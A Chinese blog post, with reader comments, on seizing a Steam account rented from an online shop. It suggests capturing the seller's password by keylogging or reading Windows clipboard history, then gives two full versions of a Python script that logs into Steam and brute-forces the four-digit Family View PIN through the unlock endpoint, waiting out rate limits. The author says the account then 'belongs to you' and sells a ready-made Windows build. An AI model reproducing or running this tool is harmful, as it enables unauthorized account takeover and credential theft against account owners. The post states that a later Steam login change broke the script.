Steam家庭监护爆破
浏览 13153 | 评论 56 | 字数 10925
卖女孩的小火柴 - 搬砖中
2020年01月04日

我去淘宝买了一个游戏的Steam离线版,实际上就是给你个账户下载安装后以离线模式运行,配合上Steam账户管理器玩起来感觉还是很不错的
但我总是对客户端上的 家庭监护 标志耿耿于怀...

失效

已确认 Steam 更换了登录算法,本文的脚本失效。

怎么搞到账户密码?

对很多店来说,他们不愿意把账户密码给你,更愿意直接远程,然后输入账户和密码,全部设置好后给设置为离线模式。
这个其实很好搞,Steam本身保护并不是非常到位,你可以采取记录键盘的方式记录下输入的密码,如果遇到和我一样偷懒复制粘贴的店家,你只需要借助Win自带的剪贴板历史(Win徽标+V)打开后就可以看到复制来的账户和密码啦~~~

怎么搞到家庭监护的Key?

Steam客户端和Steam网页都会被监护影响,经过测试,无论是客户端还是网页,都是输错5次暂停3分钟输入,那当然选择网页折腾啦~~
抓包的过程也很简单,需要注意的是,有个参数是附在网页中传递来的,需要取出来,然后遇到错误暂停3分钟继续咯。。。

rsa.js.zip
下面是脚本:

# !/user/bin/env python
# -*- coding:utf-8 -*- 
# time: 2018/9/6--19:24
__author__ = 'Henry'
# I use his login code ,thx him
__sauthor__ = 'zponds'

'''
Steam login (RSA)
URL:https://store.steampowered.com/login/
'''

import requests
import time
import re
import execjs
import json

def steam_login():
    req = requests.session()
    headers = {
        'Referer': 'https://store.steampowered.com/login/',
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) \
Chrome/79.0.3945.88 Safari/537.36 Edg/79.0.309.54',
    }
    url = 'https://store.steampowered.com/login/getrsakey/'
    data = {
        'donotcache': str(int(time.time() * 1000)),
        'username': user
    }
    html = req.post(url, data=data, headers=headers).json()
    pub_mod = html.get('publickey_mod')
    pub_exp = html.get('publickey_exp')
    timestamp = html.get('timestamp')

    with open('rsa.js', encoding='utf-8') as f:
        jsdata = f.read()
    passencrypt = execjs.compile(jsdata).call('getpwd', password, pub_mod, pub_exp)
    print(passencrypt)
    # login
    url = 'https://store.steampowered.com/login/dologin/'
    data = {
        'donotcache': str(int(time.time() * 1000)),
        'username': user,
        'password': passencrypt,
        'twofactorcode': '',
        'emailauth': '',
        'loginfriendlyname': '',
        'captchagid': '-1',
        'captcha_text': '',
        'emailsteamid': '',
        'rsatimestamp': timestamp,
        'remember_login': 'false',
    }
    html = req.post(url, data=data, headers=headers).json()
    if html.get('emailauth_needed') == True:
        print('Login requires your email verification code')
        emailid = html.get('emailsteamid')
        email = input('Please enter your email verification code:')
        # login again
        data['emailauth'] = email
        data['emailsteamid'] = emailid
        html = req.post(url, data=data, headers=headers).json()
        print(html)
        if html.get('login_complete') == True and html.get('success') == True:
            print('logining...')
            url_store = 'https://store.steampowered.com/'
            html = req.get(url_store, headers=headers).text
            username = re.findall(r'data-miniprofile=".*?">(.*?)</a>', html)[0]
            print('[Success!Username:' + username + ']')
            r = req.get('https://store.steampowered.com/parental/blocked')
            if '/parental/unlock' in r.text:
                print('The account has a family view')
                sessionID = re.findall('g_sessionID = "(.*?)";', r.text)[0]
                success = False
                start = input('PIN from:')
                start_time = int(time.time())
                for pin in range(int(start) - 1, 10000):
                    flag = True
                    while flag:
                        # 取出sessionID
                        pin_str = str(pin)
                        while len(pin_str) < 4:
                            pin_str = "0" + pin_str
                        data = {
                            'pin': pin_str,
                            'sessionid': sessionID
                        }
                        try:
                            r = req.post('https://store.steampowered.com/parental/ajaxunlock', data=data,
                                         headers=headers)
                            r_json = json.loads(r.text)
                            if r_json['success'] == False:
                                if 'wait a while' in r_json['error_message']:
                                    print('Sleep...')
                                    time.sleep(180)
                                    r = req.get('https://store.steampowered.com/parental/blocked')
                                    sessionID = re.findall('g_sessionID = "(.*?)";', r.text)[0]
                                else:
                                    flag = False
                                    print("PIN: %s: %s" % (pin_str, r_json['error_message']))
                            else:
                                print("PIN: %s: SUCCESS!" % pin_str)
                                end_time = int(time.time())
                                print("Time: %ds" % (end_time-start_time))
                                success = True
                        except BaseException as e:
                            print('Error...')
                            time.sleep(10)
                        if success:
                            exit(0)
                else:
                    print('The account does not have a family view')
        else:
            print('login fail...')
    elif html.get('success') == False and html.get('message') != '':
        print(html.get('message'))
        print('login fail...')


if __name__ == '__main__':
    user = input('account:')
    password = input('password:')
    steam_login()

0000-9999 Pin 3分钟可以尝试5次,运气再差也就2-3天的事情吧~找台服务器放着就好啦~

搞到KEY之后?

解除掉家庭监护就可以添加家庭共享啦~
接下来这个账户的使用权就属于你啦~

什么?不会运行Python?

没有关系,我已经准备好了一个WINDOWS开箱即用的版本了!购买附件,下载后可以直接使用!
同时附赠一次指导!

2020年3月18日更新

  • 掉线后会自动尝试重新登录
  • 结束后会要求输入EXIT以退出
  • BUG修复
  • 当然,编译的WINDOWS文件也更新了
# !/user/bin/env python
# -*- coding:utf-8 -*- 
# time: 2018/9/6--19:24
__author__ = 'Henry'
# I use his login code ,thx him
__sauthor__ = 'zponds'

'''
Steam login (RSA)
URL:https://store.steampowered.com/login/
'''

import requests
import time
import re
import execjs
import json

def steam_login(open_start=-1):
    req = requests.session()
    headers = {
        'Referer': 'https://store.steampowered.com/login/',
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) \
Chrome/79.0.3945.88 Safari/537.36 Edg/79.0.309.54',
    }
    url = 'https://store.steampowered.com/login/getrsakey/'
    data = {
        'donotcache': str(int(time.time() * 1000)),
        'username': user
    }
    html = req.post(url, data=data, headers=headers).json()
    pub_mod = html.get('publickey_mod')
    pub_exp = html.get('publickey_exp')
    timestamp = html.get('timestamp')

    with open('rsa.js', encoding='utf-8') as f:
        jsdata = f.read()
    passencrypt = execjs.compile(jsdata).call('getpwd', password, pub_mod, pub_exp)
    # print(passencrypt)
    # login
    url = 'https://store.steampowered.com/login/dologin/'
    data = {
        'donotcache': str(int(time.time() * 1000)),
        'username': user,
        'password': passencrypt,
        'twofactorcode': '',
        'emailauth': '',
        'loginfriendlyname': '',
        'captchagid': '-1',
        'captcha_text': '',
        'emailsteamid': '',
        'rsatimestamp': timestamp,
        'remember_login': 'true',
    }
    html = req.post(url, data=data, headers=headers).json()
    if html.get('emailauth_needed') == True:
        print('登陆需要邮箱验证码...')
        emailid = html.get('emailsteamid')
        email = input('请输入验证码:')
        # login again
        data['emailauth'] = email
        data['emailsteamid'] = emailid
        html = req.post(url, data=data, headers=headers).json()
        # print(html)
    if html.get('login_complete') == True and html.get('success') == True:
        print('logining...')
        url_store = 'https://store.steampowered.com/'
        html = req.get(url_store, headers=headers).text
        username = re.findall(r'data-miniprofile=".*?">(.*?)</a>', html)[0]
        print('[登陆成功!用户名:' + username + ']')
        r = req.get('https://store.steampowered.com/parental/blocked')
        if '/parental/unlock' in r.text:
            print('这个账户存在家庭监护')
            sessionID = re.findall('g_sessionID = "(.*?)";', r.text)[0]
            success = False
            if open_start == -1:
                start = input('从多少开始PIN(第一次运行请从0000开始):')
            else:
                start = open_start
            start_time = int(time.time())
            for pin in range(int(start) - 1, 10000):
                flag = True
                while flag:
                    # 取出sessionID
                    pin_str = str(pin)
                    while len(pin_str) < 4:
                        pin_str = "0" + pin_str
                    data = {
                        'pin': pin_str,
                        'sessionid': sessionID
                    }
                    try:
                        r = req.post('https://store.steampowered.com/parental/ajaxunlock', data=data,
                                     headers=headers)
                        if len(r.text) > 2000:
                            return steam_login(pin)
                        r_json = json.loads(r.text)
                        if r_json['success'] == False:
                            if 'wait a while'  in r_json['error_message'] or '错误尝试' in r_json['error_message']:
                                print('等待中...')
                                time.sleep(180)
                                r = req.get('https://store.steampowered.com/parental/blocked')
                                sessionID = re.findall('g_sessionID = "(.*?)";', r.text)[0]
                            else:
                                flag = False
                                print("PIN: %s: %s" % (pin_str, r_json['error_message']))
                        else:
                            print("PIN: %s: 成功!" % pin_str)
                            end_time = int(time.time())
                            print("Time: %ds" % (end_time-start_time))
                            success = True
                    except BaseException as e:
                        print('Error...')
                        time.sleep(10)
                    if success:
                        return
        else:
            print('您的账户不存在家庭监护!')
    else:
        print(html.get('message'))
        print('登陆失败...')


if __name__ == '__main__':
    user = input('账户名:')
    password = input('密码:')
    print('注意,跑PIN耗时可能非常长...可能长达两天...')
    steam_login()
    end = input('输入 EXIT 以退出...')
    while end != 'EXIT':
        end = input('输入 EXIT 以退出...')
本文作者:卖女孩的小火柴 - 搬砖中
本文链接:https://www.shinenet.cn/archives/82.html
最后修改时间:2023-12-19 21:53:36
本站未注明转载的文章均为原创,并采用 CC BY-NC-SA 4.0 授权协议,转载请注明来源,谢谢!
评论
如果可能,请填写真实邮箱,有回复会送至邮箱。请不要水评论,谢谢。
textsms
支持 Markdown 语法
email
link
评论列表
已有 56 条评论
Test
2020-03-04 21:52
测试评论
lalala
2020-02-26 23:04
具体怎么操作换参啊大佬
2020-02-27 10:24
@lalala 先跑起来吧
实在不行 联系我我可以帮忙跑一下
这玩意不怎么吃资源
小白
2020-02-27 15:50
@卖女孩的小火柴 怎么加你鸭?
2020-02-27 18:52
@小白 你咋每次邮箱都不一样...
QQ 1005468403
456
2020-02-21 22:09
大佬这个怎么用啊 【小白】
2020-03-04 21:54
@456 已经准备好WIN用的脚本了,等会儿就发
666
2020-02-20 19:26
大佬麻烦上传一下rsa.js这个文件,谢谢!
2020-02-21 19:09
@666 非常抱歉 已经更新
深圳那边
2020-03-03 19:59
@卖女孩的小火柴 在吗qq2385024260加一下想请教你
2020-03-03 21:04
@深圳那边 你加了我怎么不说话...